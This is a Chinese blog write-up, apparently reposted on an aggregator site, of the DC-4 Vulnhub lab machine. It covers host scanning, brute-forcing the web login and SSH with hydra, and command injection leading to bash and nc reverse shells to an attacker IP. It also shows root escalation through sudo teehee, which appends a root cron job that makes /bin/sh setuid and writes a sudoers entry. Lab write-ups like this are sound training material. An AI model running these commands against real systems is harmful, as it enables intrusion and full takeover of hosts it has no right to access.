畅游DC-4靶机

Posted a1oe

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了畅游DC-4靶机相关的知识,希望对你有一定的参考价值。

信息搜集

nmap -sP 192.168.146.0/24 #扫网段看看存活的主机,找到靶机
nmap -sS -Pn -A 192.168.146.141
技术图片
可以看到开放了22和80端口,那么就可以猜测下,可能要爆破ssh密码或者得到账号密码直接ssh连上去。
这里先访问web页面,只有一个登陆页面,那就先扫描下目录。
技术图片
看到访问command.php后又跳转回index.php,那么估计是要登陆才可以使用了。

getFlag

Web登陆密码爆破

这里没什么线索,但是登陆不用填验证码,就直接尝试爆破吧。
技术图片
技术图片

爆破出用户名*,密码happy。
技术图片
技术图片
也就是说这里只用密码happy就能登陆

命令执行之反弹shell

登陆进页面看到命令执行选项,这种情况估计就是参数传递命令,抓个包看看就行了。
技术图片
可以看到确实是在radio参数传输命令,但是这样比较麻烦,尝试反弹shell。

bash -i >& /dev/tcp/192.168.146.131/4444 0>&1
这里要将&符号url编码下,以便区分参数间的&符号,当然可以直接全部url编码下。bash反弹失败
技术图片

nc 192.168.31.131 4444 -t /bin/bash #nc反弹成功
技术图片
根据之前的靶机,可以直接进入/home目录下看看有哪些用户
技术图片

经检测,charles和sam目录无法ls出文件,而jim可以。
技术图片
技术图片

大概就是mbox我们没有读的权限,backups里面又一堆旧密码,test.sh内容如下
技术图片

SSH密码爆破

信息搜集的时候我们就知道22端口是开着的,可以ssh上去。
所以这里的old-passwords可能是jim进行ssh的旧密码(现在的密码也可能在其中),那么就down下来用hydra爆破下。

hydra -l jim -P pwd.txt ssh://192.168.146.141
技术图片
爆破出用户名是jim,密码是jibril04。直接连上去

提权

ssh jim@192.168.146.141
登陆进去看mbox,是一封邮件
技术图片

既然有邮件,就想到去/var/mail目录下看看,看到邮件的具体内容。有Charles发来的密码。
技术图片
密码是^xHhA&hvim0y,准备登陆charles了。在这之前,先看看jim有没有sudo权限,好的是没有的。
sudo -l
技术图片

有密码了,直接ssh连上去,ls -al查看charles目录下的内容
技术图片

看这三个文件没有发现什么有用的信息。那就也来看看有没有sudo权限。
技术图片
可以发现,可以不用密码使用root权限操作/usr/bin/teehee,这个可执行文件,查看下帮助。
技术图片
它可以将标准输入复制到每个文件,那么好办了,既然可以用root权限写文件?那岂不是直接快乐就完事了?
测试下:(成功写入文件)
技术图片

想想几个重要的文件,无非就是定时任务文件(crontab),sudoers文件
先来玩玩定任务文件把。
echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab
技术图片

再来写/etc/sudoers文件,先看看本地sudoers文件的语法。
技术图片
仿造写一个 charles ALL=(ALL:ALL) ALL
技术图片
可以看到现在charles可以以root用户身份运行所有命令
技术图片

总结

总的来说这个靶机也并不难,学到的东西好像也并不是很多。。。
主要就学到了利用suid提权,这个利用这个root权限可以写文件。之后就是有写文件权限提权的思路了。

以上是关于畅游DC-4靶机的主要内容,如果未能解决你的问题,请参考以下文章

DC-4靶机

DC-4靶机

Vulnhub入门实战 4-DC:4

Vulnhub入门实战 4-DC:4

DC-4靶场练习—teehee提权

git之旅,畅游git的世界